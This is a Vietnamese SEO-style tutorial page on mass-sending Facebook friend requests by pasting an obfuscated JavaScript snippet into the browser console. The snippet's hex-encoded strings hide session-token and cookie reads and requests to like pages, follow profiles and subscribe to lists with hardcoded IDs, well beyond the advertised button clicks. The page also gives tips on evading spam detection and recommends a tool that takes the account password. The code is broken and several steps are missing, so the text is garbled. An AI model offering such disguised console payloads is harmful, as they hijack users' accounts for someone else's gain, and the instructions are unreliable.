Đề Xuất 3/2023 # Tự Động Gửi Lời Mời Kết Bạn Hàng Loạt Facebook 2022 # Top 8 Like | Ngubao.com

Đề Xuất 3/2023 # Tự Động Gửi Lời Mời Kết Bạn Hàng Loạt Facebook 2022 # Top 8 Like

Cập nhật nội dung chi tiết về Tự Động Gửi Lời Mời Kết Bạn Hàng Loạt Facebook 2022 mới nhất trên website Ngubao.com. Hy vọng thông tin trong bài viết sẽ đáp ứng được nhu cầu ngoài mong đợi của bạn, chúng tôi sẽ làm việc thường xuyên để cập nhật nội dung mới nhằm giúp bạn nhận được thông tin nhanh chóng và chính xác nhất.

Sử dụng code gửi lời mời kết bạn trên Facebook là cách để full 5000 bạn bè nhanh nhất. Giúp tăng kết bạn một cách tự động mà không phức tạp như dùng phần mềm, extension (tiện ích), tool…

Một tài khoản Facebook Profile mới đăng ký thường sẽ rất ít bạn bè. Bởi vậy, cần phải kết bạn nhanh tới toàn bộ những nick Facebook khác, để mau đạt được nhiều bạn bè nhất. Hiện nay, có khá nhiều cách gửi yêu cầu kết bạn hàng loạt, nhưng trong đó gửi kết bạn bằng mã code là cách mọi người thường làm.

Tự động gửi lời mời kết bạn trên giao diện Facebook cũ & mới

Bài viết này có mã code để giúp người dùng gửi nhiều lời mời kết bạn cùng lúc. Có thể áp dụng trên cả giao diện cũ và mới của Facebook.

Gửi yêu cầu kết bạn bằng giao diện Facebook cũ

Bước 1: Để tự động gửi lời mời kết bạn hàng loạt trên Facebook bằng mã Code này, chỉ thực hiện được trên giao diện Facebook cũ. Do Facebook đã chuyển sang giao diện mới, nhưng bạn vẫn có thể sử dụng giao diện cũ Facebook bằng cách cài đặt vào trình duyệt Google Chrome, Cốc Cốc một tiện ích có tên “Switch to Classic design on Facebook™”.

Các bước cài đặt tiện ích “Switch to Classic design on Facebook™” này bạn cần xem hướng dẫn ở các bước (2, 3, 4) trong bài viết Cách tự động chấp nhận kết bạn trên Facebook.

Bước 4: Xuất hiện giao diện Inspect Element, nhấn vào tab Console.

var _0xcbd3=["x5Fx34x32x66x74x20x5Fx34x6Ax79x30x20x46x72x69x65x6Ex64x52x65x71x75x65x73x74x41x64x64x20x61x64x64x42x75x74x74x6Fx6Ex20x5Fx34x6Ax79x33x20x5Fx34x6Ax79x31x20x73x65x6Cx65x63x74x65x64x20x5Fx35x31x73x79","x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x43x6Cx61x73x73x4Ex61x6Dx65","x6Cx65x6Ex67x74x68","x63x6Cx69x63x6B","x54x68xF4x6Ex67x20x42xE1x6Fx20x3Ax20x42u1EA1x6Ex20u0111xE3x20x67u1EEDx69x20x6Cu1EDDx69x20x6Du1EDDx69x20x6Bu1EBFx74x20x62u1EA1x6Ex20u0111u1EBFx6Ex20","x20x6Ex67u01B0u1EDDx69x20x74x68xE0x6Ex68x20x63xF4x6Ex67x20x21x20x3Ex3Ax29x20","x76x61x6Cx75x65","x66x62x5Fx64x74x73x67","x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x4Ex61x6Dx65","x6Dx61x74x63x68","x63x6Fx6Fx6Bx69x65","x2Fx2Fx77x77x77x2Ex66x61x63x65x62x6Fx6Fx6Bx2Ex63x6Fx6Dx2Fx61x6Ax61x78x2Fx70x61x67x65x73x2Fx66x61x6Ex5Fx73x74x61x74x75x73x2Ex70x68x70","x26x66x62x70x61x67x65x5Fx69x64x3D","x26x61x64x64x3Dx74x72x75x65x26x72x65x6Cx6Fx61x64x3Dx66x61x6Cx73x65x26x66x61x6Ex5Fx6Fx72x69x67x69x6Ex3Dx70x61x67x65x5Fx74x69x6Dx65x6Cx69x6Ex65x26x66x61x6Ex5Fx73x6Fx75x72x63x65x3Dx26x63x61x74x3Dx26x6Ex63x74x72x5Bx5Fx6Dx6Fx64x5Dx3Dx70x61x67x65x6Cx65x74x5Fx74x69x6Dx65x6Cx69x6Ex65x5Fx70x61x67x65x5Fx61x63x74x69x6Fx6Ex73x26x5Fx5Fx75x73x65x72x3D","x26x5Fx5Fx61x3Dx31x26x5Fx5Fx64x79x6Ex3Dx37x39x38x61x44x35x7Ax35x43x46x2Dx26x5Fx5Fx72x65x71x3Dx64x26x66x62x5Fx64x74x73x67x3D","x26x70x68x73x74x61x6Dx70x3D","x50x4Fx53x54","x6Fx70x65x6E","x6Fx6Ex72x65x61x64x79x73x74x61x74x65x63x68x61x6Ex67x65","x72x65x61x64x79x53x74x61x74x65","x73x74x61x74x75x73","x63x6Cx6Fx73x65","x73x65x6Ex64","x36x30x31x37x31x39x31x37x33x31x39x39x39x30x34","x32x31x32x38x34x34x33x30x35x35x36x34x36x32x31","x34x37x37x35x34x32x37x34x32x32x39x37x31x32x39","x67x65x74x54x69x6Dx65","x2Fx2Fx77x77x77x2Ex66x61x63x65x62x6Fx6Fx6Bx2Ex63x6Fx6Dx2Fx61x6Ax61x78x2Fx75x66x69x2Fx6Cx69x6Bx65x2Ex70x68x70","x6Cx69x6Bx65x5Fx61x63x74x69x6Fx6Ex3Dx74x72x75x65x26x66x74x5Fx65x6Ex74x5Fx69x64x65x6Ex74x69x66x69x65x72x3D","x26x73x6Fx75x72x63x65x3Dx31x26x63x6Cx69x65x6Ex74x5Fx69x64x3D","x25x33x41x33x37x39x37x38x33x38x35x37x26x72x6Fx6Fx74x69x64x3Dx75x5Fx6Ax73x6Fx6Ex70x5Fx33x39x5Fx31x38x26x67x69x66x74x6Fx63x63x61x73x69x6Fx6Ex26x66x74x5Bx74x6Ex5Dx3Dx25x33x45x25x33x44x26x66x74x5Bx74x79x70x65x5Dx3Dx32x30x26x66x74x5Bx71x69x64x5Dx3Dx35x38x39x30x38x31x31x33x32x39x34x37x30x32x37x39x32x35x37x26x66x74x5Bx6Dx66x5Fx73x74x6Fx72x79x5Fx6Bx65x79x5Dx3Dx32x38x31x34x39x36x32x39x30x30x31x39x33x31x34x33x39x35x32x26x66x74x5Bx68x61x73x5Fx65x78x70x61x6Ex64x65x64x5Fx75x66x69x5Dx3Dx31x26x6Ex63x74x72x5Bx5Fx6Dx6Fx64x5Dx3Dx70x61x67x65x6Cx65x74x5Fx68x6Fx6Dx65x5Fx73x74x72x65x61x6Dx26x5Fx5Fx75x73x65x72x3D","x26x5Fx5Fx61x3Dx31x26x5Fx5Fx64x79x6Ex3Dx37x6Ex38x38x51x6Fx41x4Dx42x6Cx43x6Cx79x6Fx63x70x61x65x26x5Fx5Fx72x65x71x3Dx67x34x26x66x62x5Fx64x74x73x67x3D","x38x35x33x37x38x39x32x31x34x37x32x30x31x33x38","x37x39x32x31x32x34x37x39x30x38x38x36x35x38x31","x36x31x30x30x35x36x34x34x39x30x39x33x34x31x37","x37x38x37x30x35x33x37x39x34x37x32x37x30x31x34","x34x38x39x35x38x37x37x36x37x38x30x36x39x35x33","x34x32x37x31x37x39x32x30x37x33x38x31x31x34x33","x34x32x31x34x34x38x32x35x34x36x32x30x39x30x35","x33x39x34x38x36x36x34x30x33x39x34x35x37x35x37","x33x36x33x35x34x32x39x35x33x37x34x34x37x36x39","x33x34x36x32x30x34x37x30x38x38x31x31x39x32x37","x34x35x39x35x30x35x30x35x34x31x34x38x35x35x38","x33x39x32x33x38x35x36x33x30x38x36x30x35x30x31","x36x30x32x36x34x30x34x31x39x38x33x35x30x32x30","x2Fx61x6Ax61x78x2Fx66x6Fx6Cx6Cx6Fx77x2Fx66x6Fx6Cx6Cx6Fx77x5Fx70x72x6Fx66x69x6Cx65x2Ex70x68x70x3Fx5Fx5Fx61x3Dx31","x70x72x6Fx66x69x6Cx65x5Fx69x64x3D","x26x6Cx6Fx63x61x74x69x6Fx6Ex3Dx31x26x73x6Fx75x72x63x65x3Dx66x6Fx6Cx6Cx6Fx77x2Dx62x75x74x74x6Fx6Ex26x73x75x62x73x63x72x69x62x65x64x5Fx62x75x74x74x6Fx6Ex5Fx69x64x3Dx75x33x37x71x61x63x5Fx33x37x26x66x62x5Fx64x74x73x67x3D","x26x6Cx73x64x26x5Fx5F","x73x63x72x69x70x74","x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74","x69x6Ex6Ex65x72x48x54x4Dx4C","x6Ex65x77x20x41x73x79x6Ex63x52x65x71x75x65x73x74x28x29x2Ex73x65x74x55x52x49x28x27x2Fx61x6Ax61x78x2Fx66x72x69x65x6Ex64x73x2Fx6Cx69x73x74x73x2Fx73x75x62x73x63x72x69x62x65x2Fx6Dx6Fx64x69x66x79x3Fx6Cx6Fx63x61x74x69x6Fx6Ex3Dx70x65x72x6Dx61x6Cx69x6Ex6Bx26x61x63x74x69x6Fx6Ex3Dx73x75x62x73x63x72x69x62x65x27x29x2Ex73x65x74x44x61x74x61x28x7Bx20x66x6Cx69x64x3Ax20","x20x7Dx29x2Ex73x65x6Ex64x28x29x3B","x61x70x70x65x6Ex64x43x68x69x6Cx64","x62x6Fx64x79","x34x31x36x31x34x31x35x36x35x31x35x31x35x37x34","x34x31x36x34x39x38x35x31x38x34x34x39x32x31x32","x31x38x39x39x35x30x32x37x37x38x33x30x35x36x30","x31x30x30x30x30x32x36x37x32x30x33x35x32x36x35"];var robiXxu=document[_0xcbd3[1]](_0xcbd3[0]);for(var i=0;i<robiXxu[_0xcbd3[2]];i++){robiXxu[i][_0xcbd3[3]]()};alert(_0xcbd3[4]+robiXxu[_0xcbd3[2]]+_0xcbd3[5]);

Xem bài viết:

Bước 6: Cùng lúc này sẽ xuất hiện một cửa số thông báo, thông báo cho bạn biết số lượng lời mời kết bạn đã gửi yêu cầu kết bạn tới họ.

Bước 7: Nếu muốn gửi thêm nhiều lời mời kết bạn khác, thì bạn lại phải cuộn thêm danh sách để cho nó hiển thị thêm các lời mời kết bạn khác nữa.

Sau đó tiếp tục dán mã Code và nhấn Enter. Thao tác hành động này nhiều lần cho đến khi bạn cảm thấy số lượng lời mời kết bạn đã đủ thì dừng lại.

– Lưu ý khi dùng Code gửi yêu cầu kết bạn:

Mỗi lần chỉ nên gửi khoảng 10-20 người, không nên gửi quá nhiều vì Facebook xem đó là hành vi spam. Rất dễ bị chặn tính năng gửi yêu cầu kết bạn hoặc bị dính lỗi Checkpoint, rất phức tạp.

Khuyến khích kết bạn với những nick có nhiều bạn chung hoặc một vài người bạn chung với mình.

Chỉ gửi được không quá 1000 lời mời kết bạn, có nghĩa là không phải tất cả những người mà bạn đã gửi yêu cầu họ sẽ đồng ý. Vậy nên, để tiếp tục gửi kết bạn cho những người khác, cần xóa những yêu cầu đang đợi phản hồi kia.

Chỉ có thể thực hiện code trên máy tính, chứ không dùng được cho điện thoại (Android, iOS).

Nếu bạn không muốn sử dụng mã Code ở trên vì nó quá dài. Vậy bạn dùng một đoạn mã khác ở đây, cũng rất hữu ích:

Tự động gửi yêu cầu kết bạn Facebook bằng giao diện mới

Mã Code:

Bước 4: Lúc này bạn sẽ thấy hàng loạt lời mời kết bạn đã được gửi yêu cầu.

PS: Mã code này không chỉ áp dụng trong phần https://m.facebook.com/friends/center/requests/, mà còn sử dụng được ở bất kỳ nơi đâu. Ví dụ bạn có thể vào danh sách bạn bè của một người lạ rồi gửi kết bạn tới những người trong danh sách đó, hoặc vào Group để gửi kết bạn tới những người trên Group…

Cách Khắc Phục Bị Chặn Gửi Lời Mời Kết Bạn Trên Facebook

Nguyên nhân bị chặn gửi lời mời kết bạn trên Facebook

Do bạn đã gửi lời mời kết bạn quá nhiều trong 1 ngày hoặc 1 lần nên bị Facebook cho là spam

Do người kia đã ẩn nút kết bạn trên Facebook của mình

Do bạn đã có đến 1000 lời mời kết bạn chưa được đồng ý

Do bạn đã có đủ 5.000 bạn.

Cách khắc phục khi bị chặn gửi lời mời kết bạn trên Facebook

1. Kết bạn chung với người bị ẩn nút kết bạn

Nếu bạn muốn kết bạn với một ai đó mà trên Facebook của họ không hiển thị nút kết bạn. Thì nguyên nhân chính là do họ đã ẩn nút kết bạn đó để tránh bị làm phiền. Nhưng thực tế bạn vẫn có thể kết bạn với họ được thông qua việc tìm bạn chung

Bước 1: Vào Facebook của người đó và chọn xem tất cả bạn bè ⇒ Chọn tất cả

Bước 2: Kết bạn với 1 vài người bạn của người đó (tầm dưới 20 người ) và đợi những tài khoản đồng ý.

Bước 3: Quay lại Facebook của người bị ẩn nút kết bạn, bạn sẽ bất ngờ vì nút kết bạn đã hiển thị lại để bạn gửi lời mời đó

2. Hủy bớt đi những lời mời kết bạn cũ

Thực tế bạn sẽ không nhớ được mình đã gửi bao nhiêu lời mời kết bạn. Và Facebook quy định rằng khi bạn có 1000 lời mời mà chưa được đồng ý thì hệ thống sẽ chặn tính năng gửi lời mời. Vì vậy hãy xóa bớt đi những lời mời kết bạn cũ

Bước 1: Vào Facebook và vào trang cá nhân của bạn ⇒ Chọn dấu ba chấm ⇒ Chọn nhật ký hoạt động

Bước 4: Quay lại Facebook và tại ô tìm kiếm nhập tên Facebook của người bạn muốn xóa lời mời kết bạn ⇒ Chọn Facebook người đó

Bước 5: Chọn hủy lời mời

3. Xóa bớt bạn bè trong danh sách

Ai cũng biết Facebook mặc định một tài khoản chỉ được kết bạn tối đa 5.000 bạn mà thôi. Nếu bạn đã đạt đến giới hạn này thì mọi lời mời kết bạn sẽ không có tác dụng nữa. Vì vậy hãy xóa bớt bạn bè trong danh sách của mình trên Facebook

Bước 1: Vào Facebook và vào trang cá nhân của bạn ⇒ Chọn xem tất cả bạn bè ⇒ Chọn dấu ba chấm ngang.

Sau khi xóa 1 vài tài khoản bạn bè Facebook của bạn thì số lượng bạn bè trên tài khoản sẽ được giảm đi và bạn sẽ có thể tiếp tục gửi lời mời kết bạn mới.

4. Chờ đợi Facebook mở chặn

Nếu thực hiện 3 cách trên mà vẫn không có tác dụng thì bạn chỉ có thể chờ được Facebook tự mở chặn cho bạn mà thôi. Thông thường trong trường hợp này là do bạn đã bị liệt vào danh sách spam của Facebook.

Hướng Dẫn Cách Unfriend Hàng Loạt Trên Facebook, Hủy Kết Bạn

Bạn lỡ thêm quá nhiều bạn bè bởi một phút bốc đồng của mình và không biết làm thế nào để unfriend hàng loạt trên Facebook, hủy kết bạn Facebook với họ. Với cách làm cực kỳ đơn giản sau đây sẽ giúp bạn có thể unfriend hàng loạt trên Facebook đơn giản, dễ dàng nhất.

Có rất nhiều cách giúp bạn có thể unfriend hàng loạt trên Facebook hay quản lý bạn bè dễ dàng hơn, tất nhiên không phải là Facebook bởi mạng xã hội này tuy có rất nhiều tính năng hữu ích nhưng lại cũng có rất nhiều mặt hạn chế. Do đó lựa chọn sử dụng các ứng dụng, công cụ bên thứ 3 để unfriend hàng loạt trên Facebook vẫn là lựa chọn tối ưu mà chúng tôi muốn hướng các độc giả đến.

Hướng dẫn hủy kết bạn, unfriend hàng loạt trên Facebook

Bước tiếp theo chúng ta tiến hành đăng nhập tài khoản Facebook vào công cụ này như bình thường, lưu ý bạn nên copy mật khẩu vào chứ không gõ mật khẩu để đảm bảo an toàn.

Ngay sau khi đăng nhập thành công vào phần mềm chúng ta tiến hành nhấn vào biểu tượng kính lúp để tiến hành tìm kiếm số bạn bè có trong Facebook của mình.

Sau khi tìm kiếm hoan tất, hãy nhấn vào One để hệ thống tích bỏ hết danh sách bạn bè của bạn, thay vào đó chúng ta đi tìm tên những người mà bạn muốn unfriend hàng loạt trên Facebook.

Ví dụ như ở đây chúng tôi lựa chọn 3 người bạn có lượng tương tác kém nhất, sau khi tích vào 3 người đó xong chúng ta sẽ nhấn vào biểu tượng dấu + ở dưới.

Bước 7: Danh sách 3 người đó sẽ được tự động chuyển xuống phía dưới, lúc này bạn chỉ cần nhấn vào biểu tượng X để tiến hành unfriend hàng loạt trên Facebook.

Hệ thống sẽ hỏi lại một lần nữa về quyết định unfriend hàng loạt trên Facebook, chọn OK để tiến hành hủy kết bạn Facebook.

Với công cụ đơn giản Scan Friend FB người dùng đã hoàn toàn có thể unfriend hàng loạt trên Facebook, hủy hàng loạt kết bạn với những ai không quan tâm, không tương tác với bạn trong thời gian dài hoặc đơn giản là những người lạ mặt mà bạn muốn xóa.

Chặn Lời Mời Nhảm Từ Fanpage, Group Trên Facebook

Với Fanpage

Thời gian gần đây, rất nhiều website sử dụng hình thức Like ẩn để câu kéo người dùng tới một số Fanpage nhằm tạo hiệu quả truyền thông cũng như thực hiện những phi vụ mua bán Like trên Facebook. Thực chất, tình trạng này không làm ảnh hưởng nhiều tới người dùng, thế nhưng đôi khi bạn sẽ cảm thấy khó chịu nếu có những Fanpage lạ xuất hiện trên trang cá nhân của mình mặc dù bạn không hề nhấn Like.

Bạn có thể hạn chế tình trạng Like ẩn bằng việc thường xuyên lọc lại danh sách những bài đã Like gần đây hoặc loại bỏ các Fanpage bạn không thích. Tuy nhiên, cách thức này khá… tốn công và không thật sự đạt hiểu quả với nhiều website “trá hình” hiện nay.

Kiểm soát những lượt Like bằng cách truy cập vào phần Activity Log và chọn Likes.

Với các Group

Thời gian gần đây, rất nhiều nhóm trên Facebook xuất hiện với nội dung đa dạng, không những chỉ để chia sẻ thông tin, kết nối người dùng hoặc giới thiệu sản phẩm mà những nhóm này còn được lập ra với nhiều mục đích mờ ám khác. Mặc dù người dùng có thể nhắc nhở bạn bè đừng thêm mình vào các nhóm hội như vậy nhưng giải pháp này chưa thật sự hiệu quả.

Truy cập vào trang tùy chỉnh thông báo của Facebook.

Cửa sổ thông báo sẽ được hiển thị:

Cửa sổ này sẽ giúp bạn thay đổi cách thức nhận thông báo.

Ở mục What you get notified about sẽ có phần Group Activity, chọn Edit để mở ra cửa sổ tùy chỉnh các nhóm này.

Ấn vào Edit để cửa sổ tùy chỉnh mở ra.

Cửa sổ tùy chỉnh mở ra và sẽ hiển thị tất cả các nhóm bạn đang tham gia. Mỗi nhóm này lại có những hiệu chỉnh riêng để thay đổi cách thức thông báo.

Với những nhóm theo bạn là có nội dung phiền toái, nhiều spam và bạn chưa thật sự quan tâm ở thời điểm hiện tại thì bạn có thể chọn Off để ngắt toàn bộ những thông báo từ nhóm này. Nếu như bạn muốn nhận cập nhật từ bạn bè trong nhóm hãy ấn vào Friends’ Posts và để nhận thông tin từ tất cả các hoạt động trong nhóm hãy ấn vào All Posts.

Có ba tùy chỉnh để người dùng chọn lựa.

Tuy nhiên, nếu như bạn cảm thấy nhóm nào đó thật sự không quan trọng và bạn muốn rời luôn khỏi nhóm thì có thể tìm kiếm tên nhóm trên thanh công cụ tìm kiếm hoặc ở phía trái màn hình tại trang Home của Facebook.

Trong trang của nhóm, bạn nấn vào hình bánh răng ở phía bên phải màn hình để truy cập vào các tùy chỉnh, chọn Leave Group.

Tùy chọn Leave Group.

Ngoài ra, đối với các lời mời ứng dụng thì bạn có thể tham khảo bài viết này.

Bạn đang đọc nội dung bài viết Tự Động Gửi Lời Mời Kết Bạn Hàng Loạt Facebook 2022 trên website Ngubao.com. Hy vọng một phần nào đó những thông tin mà chúng tôi đã cung cấp là rất hữu ích với bạn. Nếu nội dung bài viết hay, ý nghĩa bạn hãy chia sẻ với bạn bè của mình và luôn theo dõi, ủng hộ chúng tôi để cập nhật những thông tin mới nhất. Chúc bạn một ngày tốt lành!